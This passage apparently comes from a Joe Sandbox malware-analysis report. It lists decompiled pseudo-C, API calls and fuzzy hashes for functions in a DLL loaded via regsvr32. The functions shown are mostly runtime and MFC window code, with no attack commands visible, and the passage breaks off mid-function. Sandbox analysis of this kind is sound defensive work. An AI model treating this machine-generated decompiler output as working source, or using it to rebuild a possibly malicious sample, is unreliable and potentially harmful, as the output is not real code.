                                                                                                                  • Part of subcall function 10040E0D: _doexit.LIBCMT ref: 10040E15
                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 10040A59
                                                                                                                  • Part of subcall function 1004296C: TlsGetValue.KERNEL32 ref: 10042972
                                                                                                                  • Part of subcall function 1004296C: __decode_pointer.LIBCMT ref: 10042982
                                                                                                                  • Part of subcall function 1004296C: TlsSetValue.KERNEL32(00000000,10046716,?,00000001,00000001,10043228,00000018,10069028,0000000C,100432B7,00000001,00000001,?,10042BBE,0000000D,10068FA0), ref: 1004298F
                                                                                                                  • Part of subcall function 10042951: TlsGetValue.KERNEL32 ref: 1004295B
                                                                                                                • __freefls@4.LIBCMT ref: 10040AAF
                                                                                                                  • Part of subcall function 10042996: __decode_pointer.LIBCMT ref: 100429A4
                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10040A81
                                                                                                                • ExitThread.KERNEL32 ref: 10040A88
                                                                                                                • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10040A8E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                 • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                 • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                 • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                 • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2731880238-0
                                                                                                                • Opcode ID: eb717d7ed8b98ed2e1f661009f5a854ab6c5a75166b4ccab585fd4c6b3f6e741
                                                                                                                • Instruction ID: afb47e32528da3674a406237c1367554b89d6b4f95c283fe5e5cabb1574ea47a
                                                                                                                • Opcode Fuzzy Hash: eb717d7ed8b98ed2e1f661009f5a854ab6c5a75166b4ccab585fd4c6b3f6e741
                                                                                                                • Instruction Fuzzy Hash: CD015E78600201AFD704EFA0C94994E7BA9EF48244F708479F905E7222D734EC52CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E10013060(void* __edx) {
                                                                                                                				char _v4;
                                                                                                                				char _v12;
                                                                                                                				intOrPtr* _v16;
                                                                                                                				void* __ecx;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t16;
                                                                                                                				signed int _t17;
                                                                                                                				void* _t24;
                                                                                                                				void* _t25;
                                                                                                                				intOrPtr* _t26;
                                                                                                                				void* _t36;
                                                                                                                				intOrPtr* _t38;
                                                                                                                				signed int _t40;
                                                                                                                
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10052440);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_push(_t26);
                                                                                                                				_t16 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_t17 = _t16 ^ _t40;
                                                                                                                				_t42 = _t17;
                                                                                                                				_push(_t17);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t38 = _t26;
                                                                                                                				_v16 = _t38;
                                                                                                                				 *_t38 = 0x1005934c;
                                                                                                                				_v4 = 4;
                                                                                                                				E10021AC4(_t38 + 0x1d8, _t36, _t38, _t17);
                                                                                                                				_v4 = 3;
                                                                                                                				E10021AC4(_t38 + 0x184, _t36, _t38, _t17);
                                                                                                                				_v4 = 2;
                                                                                                                				E10021AC4(_t38 + 0x130, _t36, _t38, _t42);
                                                                                                                				_v4 = 1;
                                                                                                                				E10021AC4(_t38 + 0xdc, _t36, _t38, _t42);
                                                                                                                				_v4 = 0;
                                                                                                                				E10021AC4(_t38 + 0x88, _t36, _t38, _t42);
                                                                                                                				_v4 = 0xffffffff;
                                                                                                                				_t24 = E1002BDE8(_t25, _t38, __edx, _t36, _t38, _t42);
                                                                                                                				 *[fs:0x0] = _v12;
                                                                                                                				return _t24;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1001309C
                                                                                                                  • Part of subcall function 10021AC4: __EH_prolog3.LIBCMT ref: 10021ACB
                                                                                                                • ~_Task_impl.LIBCPMT ref: 100130AC
                                                                                                                • ~_Task_impl.LIBCPMT ref: 100130BC
                                                                                                                • ~_Task_impl.LIBCPMT ref: 100130CC
                                                                                                                • ~_Task_impl.LIBCPMT ref: 100130DC
                                                                                                                  • Part of subcall function 1002BDE8: __EH_prolog3.LIBCMT ref: 1002BDEF
                                                                                                                  • Part of subcall function 1002BDE8: GlobalFree.KERNEL32(?), ref: 1002BE1E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                 • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                 • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                 • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                 • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Task_impl$H_prolog3$FreeGlobal
                                                                                                                • String ID:
                                                                                                                • API String ID: 36242457-0
                                                                                                                • Opcode ID: 6c93108f77b942b12e1f97949620aab281f2a5b73cbc7b10b2a881875f934bf7
                                                                                                                • Instruction ID: ebc56c85e892924b3cfe010b19c5d2d83d18c40ba81c3a8542310513f714a22e
                                                                                                                • Opcode Fuzzy Hash: 6c93108f77b942b12e1f97949620aab281f2a5b73cbc7b10b2a881875f934bf7
                                                                                                                • Instruction Fuzzy Hash: A8014C780097819ED315DF28E551BDABBD4EF59720F88490EE4AA532C1DB746608CBA3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 67%
                                                                                                                			E10027CA6(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				intOrPtr* _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr* _v28;
                                                                                                                				signed int _v32;
                                                                                                                				struct tagRECT _v48;
                                                                                                                				struct tagRECT _v64;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr _t181;
                                                                                                                				intOrPtr _t182;
                                                                                                                				intOrPtr _t185;
                                                                                                                				signed char _t187;
                                                                                                                				intOrPtr* _t189;
                                                                                                                				signed char _t193;
                                                                                                                				signed int _t196;
                                                                                                                				intOrPtr* _t210;
                                                                                                                				intOrPtr _t213;
                                                                                                                				intOrPtr* _t214;
                                                                                                                				signed int _t223;
                                                                                                                				signed int _t230;
                                                                                                                				intOrPtr* _t232;
                                                                                                                				void* _t243;
                                                                                                                				intOrPtr _t257;
                                                                                                                				signed int _t264;
                                                                                                                				signed int _t273;
                                                                                                                				signed int _t276;
                                                                                                                				signed int _t278;
                                                                                                                				intOrPtr* _t281;
                                                                                                                				intOrPtr _t282;
                                                                                                                				intOrPtr* _t286;
                                                                                                                				void* _t290;
                                                                                                                				intOrPtr _t291;
                                                                                                                				intOrPtr* _t293;
                                                                                                                
                                                                                                                				_t281 = _a4;
                                                                                                                				_push(0);
                                                                                                                				_t232 = __ecx;
                                                                                                                				_push(0);
                                                                                                                				_push(0x418);
                                                                                                                				_v8 = 0;
                                                                                                                				 *_t281 = 0;
                                                                                                                				 *((intOrPtr*)(_t281 + 4)) = 0;
                                                                                                                				 *((intOrPtr*)( *__ecx + 0x110))();
                                                                                                                				_v16 = 0;
                                                                                                                				if(0 != 0) {
                                                                                                                					_t276 = 0x14;
                                                                                                                					_t277 = 0 * _t276 >> 0x20;
                                                                                                                					_t185 = E100160BC(0,  ~0x00BADBAD | 0 * _t276);
                                                                                                                					_t290 = 0;
                                                                                                                					_v8 = _t185;
                                                                                                                					if(_v16 > 0) {
                                                                                                                						_t282 = _t185;
                                                                                                                						do {
                                                                                                                							E10026C61(_t232, _t290, _t282);
                                                                                                                							_t290 = _t290 + 1;
                                                                                                                							_t282 = _t282 + 0x14;
                                                                                                                						} while (_t290 < _v16);
                                                                                                                						_t291 = _v16;
                                                                                                                						_t281 = _a4;
                                                                                                                						_t243 = 0;
                                                                                                                						if(_t291 > 0) {
                                                                                                                							_t187 =  *(_t232 + 0x80);
                                                                                                                							if((_t187 & 0x00000002) == 0) {
                                                                                                                								_t277 = _t187 & 0x00000004;
                                                                                                                								if((_t187 & 0x00000004) == 0) {
                                                                                                                									L20:
                                                                                                                									_push(_t243);
                                                                                                                									asm("sbb eax, eax");
                                                                                                                									_t223 =  ~(_a8 & 0x00000002) & 0x00007fff;
                                                                                                                									__eflags = _t223;
                                                                                                                									_push(_t223);
                                                                                                                								} else {
                                                                                                                									if((_a8 & 0x00000004) == 0) {
                                                                                                                										__eflags = _a8 & 0x00000008;
                                                                                                                										if((_a8 & 0x00000008) == 0) {
                                                                                                                											__eflags = _a8 & 0x00000010;
                                                                                                                											if((_a8 & 0x00000010) == 0) {
                                                                                                                												__eflags = _a12 - 0xffffffff;
                                                                                                                												if(_a12 == 0xffffffff) {
                                                                                                                													__eflags = _t187 & 0x00000001;
                                                                                                                													if((_t187 & 0x00000001) != 0) {
                                                                                                                														goto L8;
                                                                                                                													} else {
                                                                                                                														goto L20;
                                                                                                                													}
                                                                                                                												} else {
                                                                                                                													SetRectEmpty( &_v48);
                                                                                                                													 *((intOrPtr*)( *_t232 + 0x140))( &_v48, _a8 & 0x00000002);
                                                                                                                													_t230 = _a8 & 0x00000020;
                                                                                                                													__eflags = _t230;
                                                                                                                													if(_t230 == 0) {
                                                                                                                														_t273 = _v48.right - _v48.left;
                                                                                                                														__eflags = _t273;
                                                                                                                													} else {
                                                                                                                														_t273 = _v48.bottom - _v48.top;
                                                                                                                													}
                                                                                                                													_push(_t230);
                                                                                                                													_t243 = _t273 + _a12;
                                                                                                                													goto L13;
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												_push(0);
                                                                                                                												L13:
                                                                                                                												_push(_t243);
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											_push(0);
                                                                                                                											_push(0x7fff);
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										L8:
                                                                                                                										_push(_t243);
                                                                                                                										_push( *((intOrPtr*)(_t232 + 0x70)));
                                                                                                                									}
                                                                                                                								}
                                                                                                                								_push(_t291);
                                                                                                                								_push(_v8);
                                                                                                                								E100275BC(_t232, _t277);
                                                                                                                							}
                                                                                                                							_t189 = E1002748D(_t232,  &(_v48.right), _v8, _t291);
                                                                                                                							 *_t281 =  *_t189;
                                                                                                                							 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t189 + 4));
                                                                                                                							if((_a8 & 0x00000040) != 0) {
                                                                                                                								_v24 = 0;
                                                                                                                								_a12 = 0;
                                                                                                                								_v48.bottom =  *((intOrPtr*)(_t232 + 0xa0));
                                                                                                                								 *((intOrPtr*)(_t232 + 0xa0)) = 0;
                                                                                                                								if(_t291 > 0) {
                                                                                                                									_t210 = _v8 + 4;
                                                                                                                									_v28 = _t210;
                                                                                                                									_t257 = _t291;
                                                                                                                									do {
                                                                                                                										if(( *(_t210 + 5) & 0x00000001) != 0 &&  *_t210 != 0) {
                                                                                                                											_a12 = _a12 + 1;
                                                                                                                										}
                                                                                                                										_t210 = _t210 + 0x14;
                                                                                                                										_t257 = _t257 - 1;
                                                                                                                									} while (_t257 != 0);
                                                                                                                									_t314 = _a12;
                                                                                                                									if(_a12 > 0) {
                                                                                                                										_t278 = 0x18;
                                                                                                                										_t213 = E100160BC(_t314,  ~(0 | _t314 > 0x00000000) | _a12 * _t278);
                                                                                                                										_t73 = _t213 + 8; // 0x8
                                                                                                                										_t286 = _t73;
                                                                                                                										_v24 = _t213;
                                                                                                                										_t214 = _v28;
                                                                                                                										_v32 = _a12;
                                                                                                                										_t264 = 0;
                                                                                                                										_a12 = 0;
                                                                                                                										_v12 = 0;
                                                                                                                										_v20 = _t286;
                                                                                                                										_v28 = _t214;
                                                                                                                										while(1) {
                                                                                                                											_t277 = _v32;
                                                                                                                											if(_a12 >= _v32) {
                                                                                                                												break;
                                                                                                                											}
                                                                                                                											if(( *(_t214 + 5) & 0x00000001) != 0 &&  *_t214 != 0) {
                                                                                                                												 *((intOrPtr*)(_t286 - 8)) = _t264;
                                                                                                                												_t277 =  &_v64;
                                                                                                                												 *((intOrPtr*)(_t286 - 4)) =  *_t214;
                                                                                                                												 *((intOrPtr*)( *_t232 + 0x170))(_t264,  &_v64);
                                                                                                                												E100242B0(_t232,  &_v64);
                                                                                                                												_a12 = _a12 + 1;
                                                                                                                												_v20 = _v20 + 0x18;
                                                                                                                												_t264 = _v12;
                                                                                                                												_t214 = _v28;
                                                                                                                												asm("movsd");
                                                                                                                												asm("movsd");
                                                                                                                												asm("movsd");
                                                                                                                												asm("movsd");
                                                                                                                												_t286 = _v20;
                                                                                                                											}
                                                                                                                											_t264 = _t264 + 1;
                                                                                                                											_t214 = _t214 + 0x14;
                                                                                                                											_v12 = _t264;
                                                                                                                											_v28 = _t214;
                                                                                                                											if(_t264 < _v16) {
                                                                                                                												continue;
                                                                                                                											}
                                                                                                                											break;
                                                                                                                										}
                                                                                                                										_t291 = _v16;
                                                                                                                										_t281 = _a4;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								_t193 =  *(_t232 + 0x80);
                                                                                                                								if((_t193 & 0x00000001) != 0 && (_t193 & 0x00000004) != 0) {
                                                                                                                									 *((intOrPtr*)(_t232 + 0x70)) =  *_t281;
                                                                                                                								}
                                                                                                                								_v12 = _v12 & 0x00000000;
                                                                                                                								_t323 = _t291;
                                                                                                                								if(_t291 > 0) {
                                                                                                                									_v20 = _v8;
                                                                                                                									do {
                                                                                                                										E1002728F(_t232, _t277, _t323, _v12, _v20);
                                                                                                                										_v12 = _v12 + 1;
                                                                                                                										_v20 = _v20 + 0x14;
                                                                                                                									} while (_v12 < _t291);
                                                                                                                								}
                                                                                                                								if(_a12 > 0) {
                                                                                                                									_t293 = _v24 + 8;
                                                                                                                									_v20 = _t293;
                                                                                                                									do {
                                                                                                                										_t196 = E1001D1C2(_t232,  *((intOrPtr*)(_t293 - 4)));
                                                                                                                										_v32 = _t196;
                                                                                                                										if(_t196 != 0) {
                                                                                                                											GetWindowRect( *(_t196 + 0x20),  &_v64);
                                                                                                                											 *((intOrPtr*)( *_t232 + 0x170))( *((intOrPtr*)(_v20 - 8)),  &_v64);
                                                                                                                											E1001D569(_v32, 0, _v64.left -  *_t293 + _v64.left, _v64.top -  *((intOrPtr*)(_t293 + 4)) + _v64.top, 0, 0, 0x15);
                                                                                                                											_t293 = _v20;
                                                                                                                											_t281 = _a4;
                                                                                                                										}
                                                                                                                										_t293 = _t293 + 0x18;
                                                                                                                										_t142 =  &_a12;
                                                                                                                										 *_t142 = _a12 - 1;
                                                                                                                										_t329 =  *_t142;
                                                                                                                										_v20 = _t293;
                                                                                                                									} while ( *_t142 != 0);
                                                                                                                									_push(_v24);
                                                                                                                									E100160E7(_t232, _t281, _t293, _t329);
                                                                                                                								}
                                                                                                                								 *((intOrPtr*)(_t232 + 0xa0)) = _v48.bottom;
                                                                                                                							}
                                                                                                                							_push(_v8);
                                                                                                                							E100160E7(_t232, _t281, _t291, _t329);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				SetRectEmpty( &_v64);
                                                                                                                				 *((intOrPtr*)( *_t232 + 0x140))( &_v64, _a8 & 0x00000002);
                                                                                                                				 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t281 + 4)) + _v64.top - _v64.bottom;
                                                                                                                				 *_t281 =  *_t281 + _v64.left - _v64.right;
                                                                                                                				E10035EB3( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
                                                                                                                				_t181 =  *_t281;
                                                                                                                				if(_t181 <= _v48.right) {
                                                                                                                					_t181 = _v48.right;
                                                                                                                				}
                                                                                                                				 *_t281 = _t181;
                                                                                                                				_t182 =  *((intOrPtr*)(_t281 + 4));
                                                                                                                				if(_t182 <= _v48.bottom) {
                                                                                                                					_t182 = _v48.bottom;
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t281 + 4)) = _t182;
                                                                                                                				return _t281;
                                                                                                                			}










































                                                                                                                APIs
                                                                                                                • SetRectEmpty.USER32(?), ref: 10027F9C
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                • GetWindowRect.USER32 ref: 10027F28
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$EmptyWindow_malloc
                                                                                                                • String ID: @
                                                                                                                • API String ID: 299164714-2766056989
                                                                                                                • Opcode ID: dae3294daa8c9a27f67f55fe1ffbde352a8a01721e2bb9760a289b61ed372211
                                                                                                                • Instruction ID: 0bb9f53d18901d768b51ae1a01fbd580b0b2000f8dfcbda62b694dd3f404dfc4
                                                                                                                • Opcode Fuzzy Hash: dae3294daa8c9a27f67f55fe1ffbde352a8a01721e2bb9760a289b61ed372211
                                                                                                                • Instruction Fuzzy Hash: A9C13C71900219AFCF45CFA8D885AEEBBF5FF08344F518569F81AAB251D734AD40CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E10014760(intOrPtr* __ecx, void* __edx, void* __ebp, void* __eflags) {
                                                                                                                				char _v12;
                                                                                                                				intOrPtr _v56;
                                                                                                                				intOrPtr _v64;
                                                                                                                				int _v76;
                                                                                                                				char _v84;
                                                                                                                				char _v88;
                                                                                                                				intOrPtr _v112;
                                                                                                                				intOrPtr _v116;
                                                                                                                				intOrPtr _v120;
                                                                                                                				char _v124;
                                                                                                                				intOrPtr _v136;
                                                                                                                				intOrPtr _v140;
                                                                                                                				intOrPtr _v144;
                                                                                                                				char _v148;
                                                                                                                				char _v164;
                                                                                                                				char _v168;
                                                                                                                				intOrPtr _v172;
                                                                                                                				char _v180;
                                                                                                                				char _v188;
                                                                                                                				char _v200;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t51;
                                                                                                                				struct tagRECT* _t55;
                                                                                                                				intOrPtr _t63;
                                                                                                                				void* _t67;
                                                                                                                				long _t69;
                                                                                                                				intOrPtr _t121;
                                                                                                                				struct tagRECT* _t123;
                                                                                                                				intOrPtr* _t128;
                                                                                                                				void* _t131;
                                                                                                                				void* _t135;
                                                                                                                
                                                                                                                				_t135 = __eflags;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E100527C0);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t51 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t51 ^ _t131 - 0x0000006c);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t128 = __ecx;
                                                                                                                				_v120 = E1002B6AB(__ecx, __edx);
                                                                                                                				_t55 = E100160BC(_t135, 0x10);
                                                                                                                				_t136 = _t55;
                                                                                                                				if(_t55 == 0) {
                                                                                                                					_t123 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                				} else {
                                                                                                                					_t55->left = 0;
                                                                                                                					_t55->top = 0;
                                                                                                                					_t55->right = 0;
                                                                                                                					_t55->bottom = 0;
                                                                                                                					_t123 = _t55;
                                                                                                                				}
                                                                                                                				GetWindowRect( *(_t128 + 0x20), _t123);
                                                                                                                				E1001D569(_t128, _t128, _t123->left, _t123->top, _t123->right - _t123->left, _t123->bottom - _t123->top + 0x23, 4);
                                                                                                                				_v124 = 0x46;
                                                                                                                				_v120 = 0x10e;
                                                                                                                				_v116 = 0x8c;
                                                                                                                				_v112 = 0x12c;
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x100)) + 0x134))))(0x10059a90, 0x50000000,  &_v124, _t128, 0x640);
                                                                                                                				E1001D35E(_t128 + 0x100, 5);
                                                                                                                				_t63 =  *((intOrPtr*)(_t128 + 0xac));
                                                                                                                				_t119 =  *((intOrPtr*)(_t63 + 0x134));
                                                                                                                				_t125 = _t128 + 0xac;
                                                                                                                				_v148 = 0xd7;
                                                                                                                				_v144 = 0x10e;
                                                                                                                				_v140 = 0x11d;
                                                                                                                				_v136 = 0x12c;
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x134))))(0x10059a88, 0x50000000,  &_v148, _t128, 0x641);
                                                                                                                				E1001D35E(_t128 + 0xac, 5);
                                                                                                                				E100205E2( &_v188, _t136);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push("Setting\\Setting.dat");
                                                                                                                				_v76 = 0;
                                                                                                                				_t67 = E10020A24( &_v188,  *((intOrPtr*)(_t63 + 0x134)), _t136);
                                                                                                                				_t137 = _t67;
                                                                                                                				if(_t67 != 0) {
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_v168 + 0x28))))(0, 0, 0);
                                                                                                                					E10020058(0,  &_v148,  *((intOrPtr*)(_v168 + 0x28)), _t125, _t128, _t137);
                                                                                                                					_t121 =  *_t128;
                                                                                                                					_t119 =  *((intOrPtr*)(_t121 + 8));
                                                                                                                					_v84 = 1;
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t121 + 8))))( &_v164,  &_v180, 1, 0x1000, 0);
                                                                                                                					E1001FEB3( &_v168, _t137);
                                                                                                                					E10020580(0,  &_v200);
                                                                                                                					_v88 = 0;
                                                                                                                					E1002001A(0,  &_v168,  *((intOrPtr*)(_t121 + 8)), _t125, _t128, _t137);
                                                                                                                				}
                                                                                                                				_t69 = SendMessageA( *(_t128 + 0x34c), 0xf0, 0, 0);
                                                                                                                				_t138 = _t69;
                                                                                                                				if(_t69 == 0) {
                                                                                                                					E1001D39A(_t128 + 0x2d8, 0);
                                                                                                                					E1001D39A(_t128 + 0x284, 0);
                                                                                                                					E1001D39A(_t128 + 0x230, 0);
                                                                                                                					E1001D39A(_t128 + 0x1dc, 0);
                                                                                                                				}
                                                                                                                				_v56 = 0xffffffff;
                                                                                                                				E100206EF(0,  &_v168, _t119, _t125, _t128, _t138);
                                                                                                                				 *[fs:0x0] = _v64;
                                                                                                                				return _v172;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                  • Part of subcall function 1002B6AB: GetDlgItem.USER32(?,00003020), ref: 1002B6C7
                                                                                                                  • Part of subcall function 1002B6AB: GetDlgItem.USER32(?,00003020), ref: 1002B6FA
                                                                                                                  • Part of subcall function 1002B6AB: GetWindowRect.USER32 ref: 1002B708
                                                                                                                  • Part of subcall function 1002B6AB: MapDialogRect.USER32(?,?), ref: 1002B72C
                                                                                                                  • Part of subcall function 1002B6AB: SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000020,00000016), ref: 1002B759
                                                                                                                  • Part of subcall function 1002B6AB: GetDlgItem.USER32(00000020,?), ref: 1002B76E
                                                                                                                  • Part of subcall function 1002B6AB: GetWindowRect.USER32 ref: 1002B780
                                                                                                                  • Part of subcall function 1002B6AB: SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000015), ref: 1002B79F
                                                                                                                  • Part of subcall function 1002B6AB: GetWindowRect.USER32 ref: 1002B7B6
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                • GetWindowRect.USER32 ref: 100147B7
                                                                                                                • SendMessageA.USER32 ref: 10014915
                                                                                                                  • Part of subcall function 1001D39A: EnableWindow.USER32(?,00000000), ref: 1001D3A7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$Item$DialogEnableMessageSend_malloc
                                                                                                                • String ID: F$Setting\Setting.dat
                                                                                                                • API String ID: 3745574929-3159128719
                                                                                                                • Opcode ID: 3feb124d148249ab2c5fe1efdd928a0f3a06b07ab819245acb09f0f247ffbf0e
                                                                                                                • Instruction ID: d869e2a3a323fed655b272c0ba8c281d00e5f99fba5fe1ed867fa744839d8717
                                                                                                                • Opcode Fuzzy Hash: 3feb124d148249ab2c5fe1efdd928a0f3a06b07ab819245acb09f0f247ffbf0e
                                                                                                                • Instruction Fuzzy Hash: 415159B5104340AFD314DF24CC85FABB7E9EF88700F40891DF59A97291DB74A948CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __localtime64_s
                                                                                                                • String ID: %d:%d:%d
                                                                                                                • API String ID: 773316593-941173414
                                                                                                                • Opcode ID: 4605bdd22261624fc1273dbfd4e681a595f8f7bd52795e84bc67e913853e72a7
                                                                                                                • Instruction ID: d448b202a891be26d177328d71540db7f52179dd4c801e5203996c4e8ca581b4
                                                                                                                • Opcode Fuzzy Hash: 4605bdd22261624fc1273dbfd4e681a595f8f7bd52795e84bc67e913853e72a7
                                                                                                                • Instruction Fuzzy Hash: A441AF316483409BD320CB208C92B9BB7E5EF85355F584B18F9559F2D2E772EA48C791
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E1001C549(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				intOrPtr _v44;
                                                                                                                				char _v48;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr* _t33;
                                                                                                                				intOrPtr* _t35;
                                                                                                                				intOrPtr* _t36;
                                                                                                                				void* _t38;
                                                                                                                				intOrPtr* _t52;
                                                                                                                				void* _t54;
                                                                                                                				intOrPtr _t55;
                                                                                                                				void* _t58;
                                                                                                                				void* _t60;
                                                                                                                				intOrPtr _t62;
                                                                                                                
                                                                                                                				_t62 = E10022C52(_t54, _t58, _t60, __eflags) + 0x7c;
                                                                                                                				_t55 =  *((intOrPtr*)(E10023187(_t54, _t58, _t62, __eflags) + 8));
                                                                                                                				if(_a8 != 0 || _a12 != 0) {
                                                                                                                					L4:
                                                                                                                					_v8 =  *((intOrPtr*)(E1003D47E(__eflags)));
                                                                                                                					_t33 = E1003D47E(__eflags);
                                                                                                                					_push(_a16);
                                                                                                                					 *_t33 = 0;
                                                                                                                					_push(_a12);
                                                                                                                					_push(_a8);
                                                                                                                					_push(_a4);
                                                                                                                					E1003D617(_t62, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t55);
